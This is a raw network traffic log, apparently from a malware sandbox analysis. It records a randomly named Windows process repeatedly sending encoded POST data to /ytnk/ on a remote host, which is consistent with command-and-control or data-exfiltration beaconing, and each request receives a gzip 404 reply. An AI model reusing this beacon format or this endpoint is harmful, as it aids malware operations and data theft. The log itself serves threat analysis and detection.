                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCmvAZtmE9D8JGoFs+/u3ue6gHXv2EKaUob1GKt9GjbohJwdN6IozfjU9t9F4Ijm5HAen7Afw6SmrBSwSE7AgOoqqmxv3BKvtbS6n1cg3RZqX871y+5PjC5JI1f1NtsbfTww+7XOL7GCptgHjXgQKxE9pSVsFcQ+0sCAD4LfT2FmANHVRqgvx3QQ==
                                                                                                              Nov 5, 2024 15:34:08.941663027 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:08 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 [TRUNCATED]
                                                                                                              Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!<~kY=}x3oisx?7w<E- /}wy~z2;%s7A8U0U80Bg?~/1)Zp.%z^QB|)A)[^/Xc/p>0v7"X>fq3.wFgg8 *ql%de>#Y3O'&YQ}x3T7( c18F6`xuRtJ)Ee+W;y~>IFh'KPG/6k<E<pE>%)&jK6b\E-p*4R\/ y$vQjQ]E,F!]b@DvQ(y99yRhI&bn&D7UOp0%S2`RBn/Ej5|sBx
                                                                                                              Nov 5, 2024 15:34:08.941721916 CET1289INData Raw: 55 54 d4 55 14 f4 b5 4f 4b 2f f0 16 e7 e1 1c 9b cf 7b 96 ae 6b a2 ae 19 a2 a5 ab f0 2d 08 cf c2 c1 61 de 58 3f 99 d9 67 de 67 93 a7 9e b3 dc a0 90 cb 05 9f 74 63 4f c6 ab 45 10 da 6e fc 64 2c 8b b2 fa 64 2c 1a 4f c6 4e 14 2e 16 9e cb eb 96 69 a8
                                                                                                              Data Ascii: UTUOK/{k-aX?ggtcOEnd,d,ON.i<S';<7l?ksO# esXsr&1XmnL7Y}+e~k\?@/A4;-Tyel%dm;#8byE
                                                                                                              Nov 5, 2024 15:34:08.941767931 CET1289INData Raw: dc 07 20 24 70 32 c0 67 58 86 8b c1 c8 16 a6 21 8e 3d eb a2 c8 29 f2 e2 8a 7b 3f f2 ed 00 10 dd 66 ad 03 1a 60 18 7d 64 83 9a e7 ed 63 78 13 fe dc fb e2 78 79 60 8f 3c 90 08 16 90 cb 69 89 df 99 e1 a8 51 cf 3a 25 a8 ac a5 10 47 ce 31 08 54 00 21
                                                                                                              Data Ascii: $p2gX!=){?f`}dcxxy`<iQ:%G1T!~Sxs\hXMba{.Q|s"GV|1)oCw??o2FY|v./`gG <[fjL^,%>c9gi
                                                                                                              Nov 5, 2024 15:34:08.941808939 CET1289INData Raw: 23 81 23 fb c2 e3 8a 9e b8 5a 8f e8 14 b9 51 b8 e0 a7 3e 8e b7 1f 4e 82 55 74 20 e9 8b ab 21 17 db e0 73 a1 2f 2c 99 e2 db c3 a3 cd 20 cf 48 f6 40 4a 00 7c bd a5 d9 f8 9f 2a 1e b1 4a a0 c6 7e 54 ae 10 75 71 75 54 16 c3 51 49 ca 49 5f 2c 8b 00 f7
                                                                                                              Data Ascii: ##ZQ>NUt !s/, H@J|*J~TuquTQII_,<<)'HQ*h!*b^!$*ZzG5g#!XF<Opqs8lxD<oC%sW\BOiM1V1|kh IumqS}5Azf.=^kx/
                                                                                                              Nov 5, 2024 15:34:08.941850901 CET1289INData Raw: b4 f9 f2 cf fb 1c 79 f0 c7 f7 c1 a2 b0 c5 e2 0d e2 c1 f5 c0 6c 03 53 4b 45 66 00 2d 23 6a c5 26 5d 9c 49 cb f2 81 5a a7 81 66 52 04 01 ac cf 48 a6 da 9b da ab 80 59 99 b6 29 5c 1c b9 6d 2c b8 0a 5f 9e 31 6f a6 75 d4 86 68 dd bc 77 4e f6 66 b3 7f
                                                                                                              Data Ascii: ylSKEf-#j&]IZfRHY)\m,_1ouhwNf}TKTLiBe2a:Zn9{X1TkfZ-i,4'^YgzCn2B|p NK+._6Tj`}EH`C)#%nfjrT; \%))T
                                                                                                              Nov 5, 2024 15:34:08.941891909 CET1289INData Raw: 17 5b 1a 73 3d 12 17 40 14 0d 67 62 1f 35 7f e6 f9 e8 6c 72 28 8e 24 59 1d 49 a6 de 06 85 0e 07 74 e8 92 88 e8 f4 89 2d ad 05 cc 10 8b c6 48 d2 d7 c1 cb 84 58 b3 4d 63 2d 60 8a d8 02 dc 8a 56 04 4f bc 0e 36 1a 48 8b ac 70 8c 8a 41 24 2b 03 ae e7
                                                                                                              Data Ascii: [s=@gb5lr($YIt-HXMc-`VO6HpA$+.<a;mdy$dYIh$k,%czH.M8mqz0l'np;ogbt:UZ3-I<9)5<|U^Q7\0%i6Vq
                                                                                                              Nov 5, 2024 15:34:08.941932917 CET1289INData Raw: 10 c7 0c db d4 d2 34 bd a5 f9 9c 7b 57 e0 87 3b 3e 8e 31 81 94 0d 53 34 5b b8 4d ad 29 b4 32 ab ca 67 16 28 d7 06 60 b2 31 99 94 b3 96 a0 39 3a 9b d8 07 fa 48 52 8d 91 2c 1b 23 69 c8 89 6f 63 e2 81 a4 69 23 08 a6 65 59 1d e2 e1 76 10 a9 b4 15 5d
                                                                                                              Data Ascii: 4{W;>1S4[M)2g(`19:HR,#ioci#eYv]5yE^8L1+^9qm)h9 k2\$1IVd.RE%rEc}PlY1GOQG+CQ_DYgeXFUo9(CO03H
                                                                                                              Nov 5, 2024 15:34:08.941975117 CET1289INData Raw: 4f b4 46 9f 66 30 69 6f 19 f7 b0 70 47 15 80 b2 b3 2a 29 2a 3f e2 4a 1b 43 39 19 7c 8b f6 fc 04 94 23 60 47 73 72 c5 bd a6 6b 10 b0 d5 71 80 a1 ba a0 8d 4b 8e bf 29 23 a3 95 29 15 0a 59 5a 71 b3 4b a1 a0 21 94 f4 6e 26 8c 74 49 37 2e e0 03 ca d0
                                                                                                              Data Ascii: OFf0iopG*)*?JC9|#`GsrkqK)#)YZqK!n&tI7.o*0b;%|k$sR+V*7YHZ6LlxUQmb8E["-V_j7V,Z$VN&:.k=ur."nsuvQag6WI)
                                                                                                              Nov 5, 2024 15:34:08.942018032 CET1289INData Raw: 4a 56 7c d9 4b f4 b9 05 f2 fe 51 e7 16 c8 7b 44 9b 5b 60 ed 19 65 6e 81 79 8b e8 72 8b 52 76 8b 2a 77 2f b0 7f 34 b9 4d 59 db 44 91 5b 57 d5 46 d1 e3 b6 aa b6 51 d4 b8 35 2b fd a3 c5 ad 8b e8 15 25 6e 81 bd 77 74 b8 8d f1 eb 15 15 6e 53 b5 7d a2
                                                                                                              Data Ascii: JV|KQ{D[`enyrRv*w/4MYD[WFQ5+%nwtnS}-nnv}oBE{[`mw}tFu[_4QVXmtGm[zNHEi~$5vm(l[a@#V=(k[]wMCyI7I}Q;*
                                                                                                              Nov 5, 2024 15:34:08.942059994 CET1289INData Raw: 9b 51 b6 51 2a f5 ea 66 f1 36 77 69 aa 4d 75 15 62 2a 4d 56 1d 6f 22 99 9a 67 ab b2 68 81 e3 2b ed 6e 90 0b b3 4b fd b8 92 f7 2f 28 79 6b 41 ad 0b 28 1a 22 8a 2e 8b 9d c9 1d ba 1e c5 51 3d cb b5 dc 09 c8 1f 24 ad 99 10 da 4d 25 f8 6b ea b6 f8 e2
                                                                                                              Data Ascii: QQ*f6wiMub*MVo"gh+nK/(ykA(".Q=$M%k^c+%tE4G4S*]miH{E~N|/NQY Bm5e2-EIN4M[V1tTu-td7dd1)t:u[6Hgyj]cJF{PB<l[#;(]EAE
                                                                                                              Nov 5, 2024 15:34:09.060323000 CET1289INData Raw: 82 fb b3 cf 7f e0 7f fa 39 a4 2f a3 95 97 81 02 f6 a9 7f 86 d0 45 e9 c1 e7 6a ed 7f 34 77 b7 d1 80 dc 22 65 55 69 2f 7c e1 52 08 a3 b3 f1 80 d9 9c fc 4b ab ce 3f 8d c3 39 80 8f 1f 16 f0 7d e4 fa cb 1f ff e8 93 01 b7 bc 5e 78 c7 03 7b b1 08 7c 87
                                                                                                              Data Ascii: 9/Ej4w"eUi/|RK?9}^x{||q] ?za Wp;d@i: : .a4fx<)8?8tA^y2JXHLBap3rf/@3;t|=xo`.#eu97S


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.11.204974366.198.240.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:11.254879951 CET773OUTPOST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 6a 48 6f 68 30 62 34 4e 57 4b 75 43 6e 4f 77 5a 68 68 51 39 49 38 49 30 74 46 73 2b 31 4f 33 71 65 36 6b 48 58 72 6d 55 4b 73 45 6f 61 58 65 4b 75 38 47 6a 4c 34 68 4a 34 39 4e 37 43 49 79 79 6a 55 78 6c 39 41 51 49 6a 6c 46 48 41 63 76 37 41 6f 45 35 41 47 72 48 55 77 53 61 32 67 67 4f 6f 71 71 6d 78 76 6a 76 4b 75 4a 62 54 4b 33 31 64 45 6a 53 54 4b 58 37 72 46 79 2b 76 2f 6a 47 35 4a 4a 6d 66 77 55 6c 73 65 62 54 77 78 4f 37 57 63 7a 36 64 53 6f 48 2b 33 69 6d 6d 6b 54 2b 43 39 46 75 63 4c 39 30 56 65 78 51 44 57 53 69 57 74 6e 53 47 31 63 2f 44 6c 6f 43 69 74 77 73 4e 62 32 6c 48 4f 65 54 2f 39 43 2b 2f 57 50 72 4f 6d 50 53 4c 4d 38 3d
                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCnOwZhhQ9I8I0tFs+1O3qe6kHXrmUKsEoaXeKu8GjL4hJ49N7CIyyjUxl9AQIjlFHAcv7AoE5AGrHUwSa2ggOoqqmxvjvKuJbTK31dEjSTKX7rFy+v/jG5JJmfwUlsebTwxO7Wcz6dSoH+3immkT+C9FucL90VexQDWSiWtnSG1c/DloCitwsNb2lHOeT/9C+/WPrOmPSLM8=
                                                                                                              Nov 5, 2024 15:34:11.580182076 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:11 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 [TRUNCATED]
                                                                                                              Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!<~kY=}x3oisx?7w<E- /}wy~z2;%s7A8U0U80Bg?~/1)Zp.%z^QB|)A)[^/Xc/p>0v7"X>fq3.wFgg8 *ql%de>#Y3O'&YQ}x3T7( c18F6`xuRtJ)Ee+W;y~>IFh'KPG/6k<E<pE>%)&jK6b\E-p*4R\/ y$vQjQ]E,F!]b@DvQ(y99yRhI&bn&D7UOp0%S2`RBn/Ej5|sBx
                                                                                                              Nov 5, 2024 15:34:11.580240965 CET1289INData Raw: 55 54 d4 55 14 f4 b5 4f 4b 2f f0 16 e7 e1 1c 9b cf 7b 96 ae 6b a2 ae 19 a2 a5 ab f0 2d 08 cf c2 c1 61 de 58 3f 99 d9 67 de 67 93 a7 9e b3 dc a0 90 cb 05 9f 74 63 4f c6 ab 45 10 da 6e fc 64 2c 8b b2 fa 64 2c 1a 4f c6 4e 14 2e 16 9e cb eb 96 69 a8
                                                                                                              Data Ascii: UTUOK/{k-aX?ggtcOEnd,d,ON.i<S';<7l?ksO# esXsr&1XmnL7Y}+e~k\?@/A4;-Tyel%dm;#8byE
                                                                                                              Nov 5, 2024 15:34:11.580288887 CET1289INData Raw: dc 07 20 24 70 32 c0 67 58 86 8b c1 c8 16 a6 21 8e 3d eb a2 c8 29 f2 e2 8a 7b 3f f2 ed 00 10 dd 66 ad 03 1a 60 18 7d 64 83 9a e7 ed 63 78 13 fe dc fb e2 78 79 60 8f 3c 90 08 16 90 cb 69 89 df 99 e1 a8 51 cf 3a 25 a8 ac a5 10 47 ce 31 08 54 00 21
                                                                                                              Data Ascii: $p2gX!=){?f`}dcxxy`<iQ:%G1T!~Sxs\hXMba{.Q|s"GV|1)oCw??o2FY|v./`gG <[fjL^,%>c9gi
                                                                                                              Nov 5, 2024 15:34:11.580329895 CET1289INData Raw: 23 81 23 fb c2 e3 8a 9e b8 5a 8f e8 14 b9 51 b8 e0 a7 3e 8e b7 1f 4e 82 55 74 20 e9 8b ab 21 17 db e0 73 a1 2f 2c 99 e2 db c3 a3 cd 20 cf 48 f6 40 4a 00 7c bd a5 d9 f8 9f 2a 1e b1 4a a0 c6 7e 54 ae 10 75 71 75 54 16 c3 51 49 ca 49 5f 2c 8b 00 f7
                                                                                                              Data Ascii: ##ZQ>NUt !s/, H@J|*J~TuquTQII_,<<)'HQ*h!*b^!$*ZzG5g#!XF<Opqs8lxD<oC%sW\BOiM1V1|kh IumqS}5Azf.=^kx/
                                                                                                              Nov 5, 2024 15:34:11.580373049 CET1289INData Raw: b4 f9 f2 cf fb 1c 79 f0 c7 f7 c1 a2 b0 c5 e2 0d e2 c1 f5 c0 6c 03 53 4b 45 66 00 2d 23 6a c5 26 5d 9c 49 cb f2 81 5a a7 81 66 52 04 01 ac cf 48 a6 da 9b da ab 80 59 99 b6 29 5c 1c b9 6d 2c b8 0a 5f 9e 31 6f a6 75 d4 86 68 dd bc 77 4e f6 66 b3 7f
                                                                                                              Data Ascii: ylSKEf-#j&]IZfRHY)\m,_1ouhwNf}TKTLiBe2a:Zn9{X1TkfZ-i,4'^YgzCn2B|p NK+._6Tj`}EH`C)#%nfjrT; \%))T
                                                                                                              Nov 5, 2024 15:34:11.580414057 CET1289INData Raw: 17 5b 1a 73 3d 12 17 40 14 0d 67 62 1f 35 7f e6 f9 e8 6c 72 28 8e 24 59 1d 49 a6 de 06 85 0e 07 74 e8 92 88 e8 f4 89 2d ad 05 cc 10 8b c6 48 d2 d7 c1 cb 84 58 b3 4d 63 2d 60 8a d8 02 dc 8a 56 04 4f bc 0e 36 1a 48 8b ac 70 8c 8a 41 24 2b 03 ae e7
                                                                                                              Data Ascii: [s=@gb5lr($YIt-HXMc-`VO6HpA$+.<a;mdy$dYIh$k,%czH.M8mqz0l'np;ogbt:UZ3-I<9)5<|U^Q7\0%i6Vq
                                                                                                              Nov 5, 2024 15:34:11.580457926 CET1289INData Raw: 10 c7 0c db d4 d2 34 bd a5 f9 9c 7b 57 e0 87 3b 3e 8e 31 81 94 0d 53 34 5b b8 4d ad 29 b4 32 ab ca 67 16 28 d7 06 60 b2 31 99 94 b3 96 a0 39 3a 9b d8 07 fa 48 52 8d 91 2c 1b 23 69 c8 89 6f 63 e2 81 a4 69 23 08 a6 65 59 1d e2 e1 76 10 a9 b4 15 5d
                                                                                                              Data Ascii: 4{W;>1S4[M)2g(`19:HR,#ioci#eYv]5yE^8L1+^9qm)h9 k2\$1IVd.RE%rEc}PlY1GOQG+CQ_DYgeXFUo9(CO03H
                                                                                                              Nov 5, 2024 15:34:11.580499887 CET1289INData Raw: 4f b4 46 9f 66 30 69 6f 19 f7 b0 70 47 15 80 b2 b3 2a 29 2a 3f e2 4a 1b 43 39 19 7c 8b f6 fc 04 94 23 60 47 73 72 c5 bd a6 6b 10 b0 d5 71 80 a1 ba a0 8d 4b 8e bf 29 23 a3 95 29 15 0a 59 5a 71 b3 4b a1 a0 21 94 f4 6e 26 8c 74 49 37 2e e0 03 ca d0
                                                                                                              Data Ascii: OFf0iopG*)*?JC9|#`GsrkqK)#)YZqK!n&tI7.o*0b;%|k$sR+V*7YHZ6LlxUQmb8E["-V_j7V,Z$VN&:.k=ur."nsuvQag6WI)
                                                                                                              Nov 5, 2024 15:34:11.580542088 CET1289INData Raw: 4a 56 7c d9 4b f4 b9 05 f2 fe 51 e7 16 c8 7b 44 9b 5b 60 ed 19 65 6e 81 79 8b e8 72 8b 52 76 8b 2a 77 2f b0 7f 34 b9 4d 59 db 44 91 5b 57 d5 46 d1 e3 b6 aa b6 51 d4 b8 35 2b fd a3 c5 ad 8b e8 15 25 6e 81 bd 77 74 b8 8d f1 eb 15 15 6e 53 b5 7d a2
                                                                                                              Data Ascii: JV|KQ{D[`enyrRv*w/4MYD[WFQ5+%nwtnS}-nnv}oBE{[`mw}tFu[_4QVXmtGm[zNHEi~$5vm(l[a@#V=(k[]wMCyI7I}Q;*
                                                                                                              Nov 5, 2024 15:34:11.580584049 CET1289INData Raw: 9b 51 b6 51 2a f5 ea 66 f1 36 77 69 aa 4d 75 15 62 2a 4d 56 1d 6f 22 99 9a 67 ab b2 68 81 e3 2b ed 6e 90 0b b3 4b fd b8 92 f7 2f 28 79 6b 41 ad 0b 28 1a 22 8a 2e 8b 9d c9 1d ba 1e c5 51 3d cb b5 dc 09 c8 1f 24 ad 99 10 da 4d 25 f8 6b ea b6 f8 e2
                                                                                                              Data Ascii: QQ*f6wiMub*MVo"gh+nK/(ykA(".Q=$M%k^c+%tE4G4S*]miH{E~N|/NQY Bm5e2-EIN4M[V1tTu-td7dd1)t:u[6Hgyj]cJF{PB<l[#;(]EAE
                                                                                                              Nov 5, 2024 15:34:11.698688030 CET1289INData Raw: 82 fb b3 cf 7f e0 7f fa 39 a4 2f a3 95 97 81 02 f6 a9 7f 86 d0 45 e9 c1 e7 6a ed 7f 34 77 b7 d1 80 dc 22 65 55 69 2f 7c e1 52 08 a3 b3 f1 80 d9 9c fc 4b ab ce 3f 8d c3 39 80 8f 1f 16 f0 7d e4 fa cb 1f ff e8 93 01 b7 bc 5e 78 c7 03 7b b1 08 7c 87
                                                                                                              Data Ascii: 9/Ej4w"eUi/|RK?9}^x{||q] ?za Wp;d@i: : .a4fx<)8?8tA^y2JXHLBap3rf/@3;t|=xo`.#eu97S


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.11.204974466.198.240.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:13.911338091 CET7922OUTPOST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 6a 48 6f 68 30 62 34 4e 57 4b 75 43 6e 4f 77 5a 68 68 51 39 49 38 49 30 74 46 73 2b 31 4f 33 71 65 36 6b 48 58 72 6d 55 4b 73 4d 6f 61 6b 57 4b 73 65 75 6a 5a 6f 68 4a 79 64 4e 32 43 49 7a 77 6a 55 35 68 39 41 55 69 6a 67 4a 48 44 35 6a 37 52 39 6f 35 4b 47 72 48 59 51 53 62 37 41 68 47 6f 71 37 76 78 76 7a 76 4b 75 4a 62 54 4d 7a 31 61 51 33 53 41 61 58 38 37 31 79 4d 35 50 6a 2b 35 4a 67 54 66 30 4a 48 73 74 6a 54 78 52 65 37 56 76 4c 36 41 43 70 68 2f 33 69 2b 6d 68 4b 2b 43 39 5a 59 63 4c 68 65 56 64 68 51 42 6a 7a 41 44 4a 54 2b 51 56 55 45 65 32 52 30 75 63 6f 5a 44 4a 65 73 48 50 32 43 2f 64 65 4f 32 58 76 4c 4e 46 58 43 55 4d 2f 2b 53 6b 71 75 6c 4a 62 39 45 50 78 48 2b 31 50 4d 39 4e 5a 6e 70 42 52 34 68 7a 6c 6e 32 54 68 4b 61 78 67 69 76 48 41 4a 33 36 4d 47 68 74 6a 39 4b 6b 39 6d 48 4b 42 47 4e 70 37 44 6e 4d 46 63 4b 69 41 77 62 4c 6a 41 32 6b 2b 6c 6b 67 7a 64 39 46 57 54 4d 58 45 59 54 53 77 74 78 32 4d 4d 6a 6b 48 52 74 38 30 2f 33 6d 51 4d 59 2f 59 63 45 39 57 74 65 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCnOwZhhQ9I8I0tFs+1O3qe6kHXrmUKsMoakWKseujZohJydN2CIzwjU5h9AUijgJHD5j7R9o5KGrHYQSb7AhGoq7vxvzvKuJbTMz1aQ3SAaX871yM5Pj+5JgTf0JHstjTxRe7VvL6ACph/3i+mhK+C9ZYcLheVdhQBjzADJT+QVUEe2R0ucoZDJesHP2C/deO2XvLNFXCUM/+SkqulJb9EPxH+1PM9NZnpBR4hzln2ThKaxgivHAJ36MGhtj9Kk9mHKBGNp7DnMFcKiAwbLjA2k+lkgzd9FWTMXEYTSwtx2MMjkHRt80/3mQMY/YcE9Wte4wbKgG5GSql0Ty05B7Soh5vwKQiqemm+S/3WfNONNSQuk04psmg1TaEVQX8ifDPN3B38v4IIxOiDyC5vXy6cf5OPz8ZBGa1soT/bWDCbAo8HocSKO4oe9MUGdT1ZjlNbivsqrdbT8m0zGb5OS4cGimNNx6Zcx1QfBJJ6C7L5g8QDx0yyQewP4XUDjxg7vZVzBme5cSxojoIPdjZC9KXrQ7eh0Bi2x7WwlJ9+soI6/Lc0ybIL93SwG9jGtYvj3ufuZuflaqU0d9eVvA9XzpmMZ6yanWouaZR4TOTuQV8/7fjwhJSuHegayycqzMJErNiTGWWxX6eMd4W3k6JY2L3XKVxl6ryHYLhguUdf6BfVu07/svRNNhLnwS4I4SP1nKb7KtaBqSt8/XisCDHpcgS8tTDXU60J6WycWwGJCc9EvZ8nTkRPGyTH+Cd9YDAYYAK7V8xUhnvo+cyd5Do35SizoDsmQd0PjjjiUgkFpit6q3fTRLNN8YU+8SeRJNE/QZFh1VzYQnaJAuRX1Zxb7W4Z5/C3mYBtNJkfl6uATJCwEVVTLU439BsGdfTfAb0N2Ah8EIS8EA8+YkTQIfePrFow54P7WObVO49ZQ1ZVBFcbvODr2Z4mAYy1tyhDqmYMsMFlcd9eTNeqo00+OhJmXSDdGuAEKaMuFwBkzT [TRUNCATED]
                                                                                                              Nov 5, 2024 15:34:14.253125906 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:13 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef 